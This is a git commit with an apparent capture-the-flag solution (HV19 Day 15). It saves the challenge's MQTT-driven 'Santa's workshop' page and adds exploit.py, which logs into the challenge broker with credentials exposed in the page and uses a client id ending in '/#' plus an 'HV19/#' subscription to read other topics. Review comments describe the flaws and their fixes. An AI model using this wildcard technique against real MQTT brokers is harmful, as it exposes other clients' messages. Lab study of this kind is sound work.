Day 15 solved

Roman Hergenreder 2019-12-16 20:29:35 +01:00
parent 74cc704650
commit 2bc1b72260
11 changed files with 2610 additions and 0 deletions

@ -0,0 +1,55 @@
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>Santa's workshop</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta charset="utf-8">
<link href="Santa's%20workshop_files/bootstrap.css" rel="stylesheet">
<link href="Santa's%20workshop_files/cover.css" rel="stylesheet">
<script src="Santa's%20workshop_files/countUp.js" type="module"></script>
<script src="Santa's%20workshop_files/count.js" type="module"></script>
<script src="Santa's%20workshop_files/mqttws31.js" type="text/javascript"></script>
<script src="Santa's%20workshop_files/jquery.js" type="text/javascript"></script>
<script src="Santa's%20workshop_files/config.js" type="text/javascript"></script>
<script src="Santa's%20workshop_files/mqtt.js" type="text/javascript"></script>
<style>
.bd-placeholder-img {
font-size: 1.125rem;
text-anchor: middle;
-webkit-user-select: none;
-moz-user-select: none;
-ms-user-select: none;
user-select: none;
}
@media (min-width: 768px) {
.bd-placeholder-img-lg {
font-size: 3.5rem;
}
}
</style>
<script type="text/javascript">
var countUp
$(document).ready(function() {
MQTTconnect();
$("body").click(function(){
$(".alert").hide();
});
});
</script>
</head>
<body class="text-center">
<div id="alert"><div class="alert alert-warning" role="alert" style="display: none;">Uhm.. somebody is currently messing with me. Try refreshing the page. I lost connection but why? 🤔</div></div>
<div class="cover-container d-flex w-100 h-100 p-3 mx-auto flex-column">
<main role="main" class="inner cover">
<h1 class="cover-heading">Ho Ho Ho</h1>
<p class="lead">The elves in Santa's workshop <br>
Are busy as can be<br>
They all are working around the clock<br>
On toys for you and me</p>
<img style="float:left" src="Santa's%20workshop_files/gift.svg" width="200">
<h1 style="margin-top: 2.5em;" id="gifts">7.347.622</h1><p class="lead">gifts built by the elves!</p>
</main>
</div>
</body></html>

File diff suppressed because one or more lines are too long

@ -0,0 +1,15 @@
var mqtt;
var reconnectTimeout = 100;
var host = 'whale.hacking-lab.com';
var port = 9001;
var useTLS = false;
var username = 'workshop';
var password = '2fXc7AWINBXyruvKLiX';
var clientid = localStorage.getItem("clientid");
if (clientid == null) {
clientid = ('' + (Math.round(Math.random() * 1000000000000000))).padStart(16, '0');
localStorage.setItem("clientid", clientid);
}
// var topic = 'HV19/gifts/'+clientid;
var topic = 'HV19/gifts/'+clientid+'/flag-tbd';
var cleansession = true;
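Review bot: The broker login in `username`/`password` is committed in clear text and, with `useTLS = false`, travels over an unencrypted WebSocket, so every visitor and anyone on the network path holds the same credential. A secret shipped to a browser cannot be kept private, so the separation between visitors rests entirely on the broker's per-topic authorisation. The only value that distinguishes one visitor's topic from another's is `clientid`, which the client chooses itself and generates with `Math.random()`. If this file is kept as a reference, I would add a comment such as `// shared, public credential: authorisation must be enforced by the broker ACL, not by this file`. For a real deployment, set `useTLS = true` and generate the id with `crypto.getRandomValues`.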

@ -0,0 +1,10 @@
import { CountUp } from './countUp.js';
const options = {
separator: '.',
};
countUp = new CountUp('gifts', 0, options);
if (!countUp.error) {
countUp.start();
} else {
console.error(countUp.error);
}
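Review bot: `countUp = new CountUp('gifts', 0, options);` assigns to a name this module never declares. It works only because the page's inline script declares `var countUp` as a global before the deferred module runs; on a page without that declaration, the same line throws a ReferenceError, since modules are always strict. A comment stating the dependency, or an explicit `window.countUp = new CountUp('gifts', 0, options);`, would make it visible. mqtt.js in this commit reads the same global in `onMessageArrived`.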

@ -0,0 +1,248 @@
var __assign = (this && this.__assign) || function () {
__assign = Object.assign || function(t) {
for (var s, i = 1, n = arguments.length; i < n; i++) {
s = arguments[i];
for (var p in s) if (Object.prototype.hasOwnProperty.call(s, p))
t[p] = s[p];
}
return t;
};
return __assign.apply(this, arguments);
};
// playground: stackblitz.com/edit/countup-typescript
var CountUp = /** @class */ (function () {
function CountUp(target, endVal, options) {
var _this = this;
this.target = target;
this.endVal = endVal;
this.options = options;
this.version = '2.0.4';
this.defaults = {
startVal: 0,
decimalPlaces: 0,
duration: 2,
useEasing: true,
useGrouping: true,
smartEasingThreshold: 999,
smartEasingAmount: 333,
separator: ',',
decimal: '.',
prefix: '',
suffix: ''
};
this.finalEndVal = null; // for smart easing
this.useEasing = true;
this.countDown = false;
this.error = '';
this.startVal = 0;
this.paused = true;
this.count = function (timestamp) {
if (!_this.startTime) {
_this.startTime = timestamp;
}
var progress = timestamp - _this.startTime;
_this.remaining = _this.duration - progress;
// to ease or not to ease
if (_this.useEasing) {
if (_this.countDown) {
_this.frameVal = _this.startVal - _this.easingFn(progress, 0, _this.startVal - _this.endVal, _this.duration);
}
else {
_this.frameVal = _this.easingFn(progress, _this.startVal, _this.endVal - _this.startVal, _this.duration);
}
}
else {
if (_this.countDown) {
_this.frameVal = _this.startVal - ((_this.startVal - _this.endVal) * (progress / _this.duration));
}
else {
_this.frameVal = _this.startVal + (_this.endVal - _this.startVal) * (progress / _this.duration);
}
}
// don't go past endVal since progress can exceed duration in the last frame
if (_this.countDown) {
_this.frameVal = (_this.frameVal < _this.endVal) ? _this.endVal : _this.frameVal;
}
else {
_this.frameVal = (_this.frameVal > _this.endVal) ? _this.endVal : _this.frameVal;
}
// decimal
_this.frameVal = Math.round(_this.frameVal * _this.decimalMult) / _this.decimalMult;
// format and print value
_this.printValue(_this.frameVal);
// whether to continue
if (progress < _this.duration) {
_this.rAF = requestAnimationFrame(_this.count);
}
else if (_this.finalEndVal !== null) {
// smart easing
_this.update(_this.finalEndVal);
}
else {
if (_this.callback) {
_this.callback();
}
}
};
// default format and easing functions
this.formatNumber = function (num) {
var neg = (num < 0) ? '-' : '';
var result, x, x1, x2, x3;
result = Math.abs(num).toFixed(_this.options.decimalPlaces);
result += '';
x = result.split('.');
x1 = x[0];
x2 = x.length > 1 ? _this.options.decimal + x[1] : '';
if (_this.options.useGrouping) {
x3 = '';
for (var i = 0, len = x1.length; i < len; ++i) {
if (i !== 0 && (i % 3) === 0) {
x3 = _this.options.separator + x3;
}
x3 = x1[len - i - 1] + x3;
}
x1 = x3;
}
// optional numeral substitution
if (_this.options.numerals && _this.options.numerals.length) {
x1 = x1.replace(/[0-9]/g, function (w) { return _this.options.numerals[+w]; });
x2 = x2.replace(/[0-9]/g, function (w) { return _this.options.numerals[+w]; });
}
return neg + _this.options.prefix + x1 + x2 + _this.options.suffix;
};
this.easeOutExpo = function (t, b, c, d) {
return c * (-Math.pow(2, -10 * t / d) + 1) * 1024 / 1023 + b;
};
this.options = __assign({}, this.defaults, options);
this.formattingFn = (this.options.formattingFn) ?
this.options.formattingFn : this.formatNumber;
this.easingFn = (this.options.easingFn) ?
this.options.easingFn : this.easeOutExpo;
this.startVal = this.validateValue(this.options.startVal);
this.frameVal = this.startVal;
this.endVal = this.validateValue(endVal);
this.options.decimalPlaces = Math.max(0 || this.options.decimalPlaces);
this.decimalMult = Math.pow(10, this.options.decimalPlaces);
this.resetDuration();
this.options.separator = String(this.options.separator);
this.useEasing = this.options.useEasing;
if (this.options.separator === '') {
this.options.useGrouping = false;
}
this.el = (typeof target === 'string') ? document.getElementById(target) : target;
if (this.el) {
this.printValue(this.startVal);
}
else {
this.error = '[CountUp] target is null or undefined';
}
}
// determines where easing starts and whether to count down or up
CountUp.prototype.determineDirectionAndSmartEasing = function () {
var end = (this.finalEndVal) ? this.finalEndVal : this.endVal;
this.countDown = (this.startVal > end);
var animateAmount = end - this.startVal;
if (Math.abs(animateAmount) > this.options.smartEasingThreshold) {
this.finalEndVal = end;
var up = (this.countDown) ? 1 : -1;
this.endVal = end + (up * this.options.smartEasingAmount);
this.duration = this.duration / 2;
}
else {
this.endVal = end;
this.finalEndVal = null;
}
if (this.finalEndVal) {
this.useEasing = false;
}
else {
this.useEasing = this.options.useEasing;
}
};
// start animation
CountUp.prototype.start = function (callback) {
if (this.error) {
return;
}
this.callback = callback;
if (this.duration > 0) {
this.determineDirectionAndSmartEasing();
this.paused = false;
this.rAF = requestAnimationFrame(this.count);
}
else {
this.printValue(this.endVal);
}
};
// pause/resume animation
CountUp.prototype.pauseResume = function () {
if (!this.paused) {
cancelAnimationFrame(this.rAF);
}
else {
this.startTime = null;
this.duration = this.remaining;
this.startVal = this.frameVal;
this.determineDirectionAndSmartEasing();
this.rAF = requestAnimationFrame(this.count);
}
this.paused = !this.paused;
};
// reset to startVal so animation can be run again
CountUp.prototype.reset = function () {
cancelAnimationFrame(this.rAF);
this.paused = true;
this.resetDuration();
this.startVal = this.validateValue(this.options.startVal);
this.frameVal = this.startVal;
this.printValue(this.startVal);
};
// pass a new endVal and start animation
CountUp.prototype.update = function (newEndVal) {
cancelAnimationFrame(this.rAF);
this.startTime = null;
this.endVal = this.validateValue(newEndVal);
if (this.endVal === this.frameVal) {
return;
}
this.startVal = this.frameVal;
if (!this.finalEndVal) {
this.resetDuration();
}
this.determineDirectionAndSmartEasing();
this.rAF = requestAnimationFrame(this.count);
};
CountUp.prototype.printValue = function (val) {
var result = this.formattingFn(val);
if (this.el.tagName === 'INPUT') {
var input = this.el;
input.value = result;
}
else if (this.el.tagName === 'text' || this.el.tagName === 'tspan') {
this.el.textContent = result;
}
else {
this.el.innerHTML = result;
}
};
CountUp.prototype.ensureNumber = function (n) {
return (typeof n === 'number' && !isNaN(n));
};
CountUp.prototype.validateValue = function (value) {
var newValue = Number(value);
if (!this.ensureNumber(newValue)) {
this.error = "[CountUp] invalid start or end value: " + value;
return null;
}
else {
return newValue;
}
};
CountUp.prototype.resetDuration = function () {
this.startTime = null;
this.duration = Number(this.options.duration) * 1000;
this.remaining = this.duration;
};
return CountUp;
}());
export { CountUp };

@ -0,0 +1 @@
body,html{height:100%;background-color:#fff}body{display:-ms-flexbox;display:flex;color:#fff;text-shadow:0 .05rem .1rem rgba(0,0,0,.5);box-shadow:inset 0 0 5rem rgba(0,0,0,.5);background-image:url(bg.jpg);background-size:center;background-position:center;background-repeat:no-repeat}h1{color:#a90307}p{color:#000}.cover-container{max-width:42em}.cover{margin:auto 0;padding:0 1.5rem}.cover .btn-lg{padding:.75rem 1.25rem;font-weight:700}#alert{width:100%;position:fixed;top:0;z-index:99999}

@ -0,0 +1,48 @@
<?xml version="1.0" encoding="iso-8859-1"?>
<!-- Generator: Adobe Illustrator 19.0.0, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->
<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"
viewBox="0 0 280.071 280.071" style="enable-background:new 0 0 280.071 280.071;" xml:space="preserve">
<g>
<path style="fill:#BF392C;" d="M232.986,17.729C227.578,6.624,216.316,0,202.901,0C172.326,0,150.641,33.034,140,53.879
C129.332,33.052,107.683,0.21,77.168,0.21c-19.357,0-33.393,13.791-33.393,32.492c0,33.166,31.634,54.807,95.227,54.807
s97.283-27.81,97.283-54.535C236.276,27.67,235.305,22.463,232.986,17.729z M82.559,50.65
c-9.258-5.531-12.557-11.726-12.557-15.699c0-5.075,5.399-8.751,12.837-8.751c17.922,0,40.849,29.438,48.558,43.842
C110.745,68.502,89.612,54.868,82.559,50.65z M208.79,39.668c-4.647,9.381-29.219,28.073-59.917,30.365
c7.745-14.404,30.715-43.842,48.357-43.842c6.826,0,10.746,2.958,12.111,5.723C210.426,34.12,210.243,36.736,208.79,39.668z"/>
<path style="fill:#EFC75E;" d="M280.048,87.552H0.021v70.024h8.751V280.07h262.526V157.577h8.751
C280.048,157.577,280.048,87.552,280.048,87.552z"/>
<path style="fill:#D7B354;" d="M8.772,157.568h262.526v17.502H8.772V157.568z"/>
<path style="fill:#BF392C;" d="M122.533,87.552h35.003v192.519h-35.003C122.533,280.071,122.533,87.552,122.533,87.552z"/>
<rect x="122.533" y="157.568" style="fill:#AC3327;" width="35.003" height="17.502"/>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>


File diff suppressed because one or more lines are too long

@ -0,0 +1,47 @@
function MQTTconnect() {
if (typeof path == "undefined") {
path = '';
}
mqtt = new Paho.MQTT.Client(
host,
port,
path,
clientid
);
var options = {
timeout: 3,
keepAliveInterval: 60,
useSSL: useTLS,
cleanSession: cleansession,
onSuccess: onConnect,
onFailure: function (message) {
$('#status').val("Connection failed: " + message.errorMessage + "Retrying");
setTimeout(MQTTconnect, reconnectTimeout);
}
};
mqtt.onConnectionLost = onConnectionLost;
mqtt.onMessageArrived = onMessageArrived;
if (username != null) {
options.userName = username;
options.password = password;
}
mqtt.connect(options);
}
function onConnect() {
mqtt.subscribe(topic, {qos: 0});
}
function onConnectionLost(response) {
setTimeout(MQTTconnect, reconnectTimeout);
$('#alert').html('<div class="alert alert-warning" role="alert">Uhm.. somebody is currently messing with me. Try refreshing the page. I lost connection but why? 🤔</div>');
};
function onMessageArrived(message) {
//var topic = message.destinationName;
var payload = message.payloadString;
countUp.update(payload);
};
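Review bot: `onMessageArrived` passes `message.payloadString` straight to `countUp.update()`, so whatever any publisher on the subscribed topic sends drives the page. CountUp's `validateValue` (countUp.js in this commit) coerces with `Number()`, but on a non-numeric payload it only sets `error` and returns `null`, and `update` carries on animating with that `null`. I would validate at the boundary instead: `var value = Number(message.payloadString); if (!Number.isFinite(value)) { return; } countUp.update(value);`. Separately, both `onFailure` and `onConnectionLost` retry after the fixed `reconnectTimeout` of 100 ms with no backoff or cap, and `onFailure` writes to `#status`, an element the HTML page in this commit does not contain.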

File diff suppressed because it is too large Load Diff

34
Day 15/exploit.py Normal file

@ -0,0 +1,34 @@
#!/usr/bin/python
import paho.mqtt.client as mqtt
import time
import random
import logging
def on_connect(client, userdata, flags, rc):
if rc == 0:
path = 'HV19/#';
client.subscribe(path, qos=0)
def on_message(client, userdata, msg):
print(msg.topic, msg.payload)
def on_publish(client, userdata, mid):
print("message published")
def createClient(username, password):
clientId = "%016d/#" % 0
client = mqtt.Client(transport="websockets", client_id=clientId, clean_session=True)
client.username_pw_set(username, password)
client.on_connect = on_connect
client.on_message = on_message
client.on_publish = on_publish
client.on_log = on_log
return client
def on_log(c, userdata, level, buf):
print(str(level), buf)
client = createClient("workshop", "2fXc7AWINBXyruvKLiX")
client.connect("whale.hacking-lab.com", 9001, 100)
client.loop_forever()
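Review bot: `on_connect` does nothing when `rc` is non-zero, so a rejected login or refused connection leaves the script in `loop_forever()` with only the raw `on_log` output to explain why; adding `else: print("connect failed, rc=%d" % rc)` would make the failure explicit. The broker credentials are repeated here as literals (they also appear in config.js), and `time`, `random` and `logging` are imported but never used. The script also has no comment on what the `/#` suffix in `clientId` and the `HV19/#` subscription are meant to demonstrate. A short docstring naming the broker-side condition would make this usable as a write-up; presumably that condition is an ACL that substitutes the client id into a topic pattern without rejecting wildcard characters, in which case the fix belongs in the broker's client-id validation.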